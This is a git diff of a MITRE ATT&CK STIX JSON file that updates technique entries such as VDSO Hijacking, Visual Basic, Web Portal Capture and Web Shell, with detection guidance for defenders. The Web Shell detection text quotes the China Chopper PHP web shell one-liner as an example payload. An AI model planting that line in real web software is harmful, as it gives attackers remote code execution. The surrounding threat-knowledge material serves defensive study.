+ "id": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
"x_mitre_version": "1.2",
"x_mitre_data_sources": [
"Anti-virus",
@@ -28159,55 +29127,9 @@
],
"x_mitre_is_subtechnique": false
},
- {
- "external_references": [
- {
- "source_name": "mitre-attack",
- "external_id": "T1059.005",
- "url": "https://attack.mitre.org/techniques/T1059/005"
- },
- {
- "source_name": "Microsoft VBScript",
- "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)",
- "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020."
- }
- ],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "VBScript",
- "description": "Adversaries may abuse VBScript scripts for execution. VBScript is a Windows scripting language modeled after the Visual Basic language, also known as Visual Basic for Applications (VBA).(Citation: Microsoft VBScript) VBScript is built on top of the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM), which allows it to interact with the environment. VBScript can also be used in place of JavaScript on webpages served to Internet Explorer, however, most modern browsers do not come with VBScript support.\n\nIn a command-line environment, Cscript.exe is used to execute scripts. If a GUI is desired, Wscript.exe is used.\n\nAdversaries may abuse VBScript to execute malicious command and payloads. A common usage is embedding VBScript content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
- "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T17:34:02.708Z",
- "created": "2020-03-09T14:29:51.508Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Windows event logs",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Monitor for usage of Cscript.exe or Wscript.exe. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
- },
{
"id": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5",
- "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (VDSO) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries mapped into all user-land processes by the kernel. An adversary may patch memory address references stored in a process' global offset table (which store absolute addresses of functions) to inject malicious code into a running process. This code can then be invoked by redirecting the execution flow of the process (ex: using custom shellcode or hijacked system calls). (Citation: ELF Injection May 2009) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
+ "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
"name": "VDSO Hijacking",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -28224,6 +29146,21 @@
"url": "https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html",
"description": "O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020."
},
+ {
+ "source_name": "Backtrace VDSO",
+ "url": "https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/",
+ "description": "backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "VDSO Aug 2005",
+ "url": "https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/",
+ "description": "Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020."
+ },
+ {
+ "source_name": "Syscall 2014",
+ "url": "https://lwn.net/Articles/604515/",
+ "description": "Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020."
+ },
{
"description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.",
"source_name": "ArtOfMemoryForensics"
@@ -28234,7 +29171,7 @@
"source_name": "GNU Acct"
},
{
- "url": "https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
"source_name": "RHEL auditd"
},
@@ -28255,23 +29192,22 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:58:10.186Z",
+ "modified": "2020-06-20T22:28:45.232Z",
"created": "2020-01-14T01:35:00.781Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
+ "x_mitre_detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"System calls",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
- ]
+ "x_mitre_platforms": [
+ "Linux"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
@@ -28302,21 +29238,21 @@
],
"modified": "2020-03-23T20:41:21.147Z",
"created": "2020-02-11T18:28:44.950Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_system_requirements": [
+ "VNC server installed and listening for connections."
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.",
"x_mitre_data_sources": [
"Process use of network",
"Network protocol analysis",
"Netflow/Enclave netflow"
],
- "x_mitre_system_requirements": [
- "VNC server installed and listening for connections."
+ "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -28368,31 +29304,13 @@
"phase_name": "initial-access"
}
],
- "modified": "2020-03-23T21:59:36.955Z",
+ "modified": "2020-06-20T22:44:36.043Z",
"created": "2017-05-31T21:31:00.645Z",
- "x_mitre_version": "2.1",
- "x_mitre_data_sources": [
- "AWS CloudTrail logs",
- "Stackdriver logs",
- "Authentication logs",
- "Process monitoring"
- ],
- "x_mitre_defense_bypassed": [
- "Firewall",
- "Host intrusion prevention systems",
- "Network intrusion detection system",
- "Process whitelisting",
- "System access controls",
- "Anti-virus"
- ],
- "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_effective_permissions": [
- "User",
- "Administrator"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Netskope",
+ "Mark Wee",
+ "Praetorian"
],
"x_mitre_platforms": [
"Linux",
@@ -28405,12 +29323,30 @@
"Office 365",
"Azure AD"
],
- "x_mitre_contributors": [
- "Netskope",
- "Mark Wee",
- "Praetorian"
+ "x_mitre_effective_permissions": [
+ "User",
+ "Administrator"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+ "x_mitre_defense_bypassed": [
+ "Firewall",
+ "Host intrusion prevention systems",
+ "Network intrusion detection system",
+ "Application control",
+ "System access controls",
+ "Anti-virus"
+ ],
+ "x_mitre_data_sources": [
+ "AWS CloudTrail logs",
+ "Stackdriver logs",
+ "Authentication logs",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "2.1"
},
{
"object_marking_refs": [
@@ -28444,25 +29380,26 @@
"phase_name": "collection"
}
],
- "modified": "2019-07-17T21:14:04.412Z",
+ "modified": "2020-07-14T19:40:47.644Z",
"created": "2017-05-31T21:31:37.917Z",
- "x_mitre_platforms": [
- "Windows",
- "macOS"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"API monitoring"
],
- "x_mitre_contributors": [
- "Praetorian"
+ "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.",
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -28489,34 +29426,116 @@
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:20:15.523Z",
+ "modified": "2020-07-01T16:32:02.272Z",
"created": "2019-04-17T22:22:24.505Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host forensic analysis",
- "Signature-based detection",
- "Static File Analysis"
- ],
- "x_mitre_contributors": [
- "Deloitte Threat Library Team",
- "Sunny Neo"
+ "x_mitre_version": "1.2",
+ "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
],
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
+ "x_mitre_contributors": [
+ "Deloitte Threat Library Team",
+ "Sunny Neo"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host forensic analysis",
+ "Signature-based detection",
+ "Static File Analysis"
+ ],
+ "x_mitre_is_subtechnique": false
+ },
+ {
+ "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
+ "name": "Visual Basic",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1059.005",
+ "url": "https://attack.mitre.org/techniques/T1059/005"
+ },
+ {
+ "source_name": "VB .NET Mar 2020",
+ "url": "https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/",
+ "description": ".NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "VB Microsoft",
+ "url": "https://docs.microsoft.com/dotnet/visual-basic/",
+ "description": "Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft VBA",
+ "url": "https://docs.microsoft.com/office/vba/api/overview/",
+ "description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft VBScript",
+ "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)",
+ "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020."
+ }
+ ],
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "modified": "2020-06-25T03:32:51.046Z",
+ "created": "2020-03-09T14:29:51.508Z",
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
+ ],
"x_mitre_data_sources": [
+ "DLL monitoring",
+ "Loaded DLLs",
+ "File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
- "x_mitre_version": "1.2"
+ "x_mitre_detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-02-11T18:59:50.058Z",
+ "modified": "2020-03-24T21:16:16.580Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e",
"description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)",
"name": "Web Portal Capture",
@@ -28541,32 +29560,19 @@
"source_name": "Volexity Virtual Private Keylogging"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-24T21:16:16.580Z",
- "created": "2020-02-11T18:59:50.058Z",
- "x_mitre_system_requirements": [
- "An externally facing login portal is configured."
- ],
- "x_mitre_data_sources": [
- "File monitoring"
- ],
- "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.",
+ "x_mitre_data_sources": [
+ "File monitoring"
+ ],
+ "x_mitre_system_requirements": [
+ "An externally facing login portal is configured."
]
},
{
@@ -28598,9 +29604,11 @@
],
"modified": "2020-03-26T20:15:35.821Z",
"created": "2020-03-15T16:13:46.151Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
"x_mitre_data_sources": [
"Network protocol analysis",
"Process monitoring",
@@ -28608,16 +29616,24 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:13.915Z",
+ "modified": "2020-03-26T23:26:10.297Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Web Service",
+ "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -28630,19 +29646,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
- "name": "Web Service",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T23:26:10.297Z",
- "created": "2017-05-31T21:31:13.915Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -28728,23 +29734,23 @@
],
"modified": "2020-03-24T12:36:24.501Z",
"created": "2020-01-30T17:48:49.395Z",
- "x_mitre_platforms": [
- "Office 365",
- "SaaS"
- ],
- "x_mitre_contributors": [
- "Johann Rehberger"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
],
+ "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Authentication logs"
],
- "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
+ "x_mitre_contributors": [
+ "Johann Rehberger"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Office 365",
+ "SaaS"
+ ]
},
{
"id": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df",
@@ -28808,29 +29814,29 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-25T23:10:24.898Z",
+ "modified": "2020-04-17T17:47:56.673Z",
"created": "2019-12-13T16:46:18.927Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Adversary access to Web server with vulnerability or account to upload and serve the Web shell file."
],
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
"x_mitre_data_sources": [
"Process monitoring",
"Netflow/Enclave netflow",
"File monitoring",
"Authentication logs"
],
- "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);> \n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
- "x_mitre_permissions_required": [
- "SYSTEM",
- "User"
- ],
- "x_mitre_system_requirements": [
- "Adversary access to Web server with vulnerability or account to upload and serve the Web shell file."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -28888,13 +29894,15 @@
"created": "2017-05-31T21:31:00.200Z"
},
{
- "id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
- "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. \n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage cmd.exe to execute various commands and payloads. Common uses include cmd.exe /c to execute a single command, or abusing cmd.exe interactively with input and output forwarded over a command and control channel.",
- "name": "Windows Command Shell",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-03-09T14:12:31.196Z",
+ "modified": "2020-03-28T17:02:13.722Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -28902,15 +29910,13 @@
"url": "https://attack.mitre.org/techniques/T1059/003"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-28T17:02:13.722Z",
- "created": "2020-03-09T14:12:31.196Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Windows Command Shell",
